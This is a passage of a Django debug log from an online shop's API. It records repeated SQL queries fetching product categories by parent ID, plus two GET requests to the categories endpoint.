"shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:39:09,831 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:39:09,833 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:39:09,835 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:39:09,839 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:39:09,841 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:39:09,844 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:39:09,846 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:39:09,848 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:39:09,850 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:39:09,852 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:39:09,856 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:39:09,858 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:39:09,860 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:39:09,862 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:39:09,864 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:39:09,866 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:39:09,868 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:39:09,870 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:39:09,872 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:39:09,874 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:39:09,876 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:39:09,879 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:39:09,882 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:39:09,885 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:39:09,887 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) DEBUG 2019-12-16 07:39:09,887 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:39:09,890 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:39:09,895 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:39:09,897 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:39:09] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [16/Dec/2019 07:39:09] "GET /api/v1/categories/big-fire HTTP/1.0" 200 15396 DEBUG 2019-12-16 07:41:27,612 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:41:27,619 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:41:27,622 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:41:27,624 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:41:27,627 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:41:27,630 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:41:27,632 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:41:27,634 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:41:27,636 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:41:27,640 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:41:27,642 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:41:27,645 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:41:27,647 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:41:27,649 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:41:27,653 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:41:27,655 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:41:27,657 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:41:27,659 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:41:27,661 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:41:27,665 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:41:27,673 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:41:27,675 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:41:27,677 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:41:27,679 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:41:27,682 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:41:27,682 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:41:27,690 utils 20136 140506432534272 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:41:27,692 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:41:27,695 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:41:27,697 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:41:27,699 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:41:27,701 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:41:27,704 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:41:27,706 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:41:27,708 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:41:27,711 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:41:27,713 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:41:27,715 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", 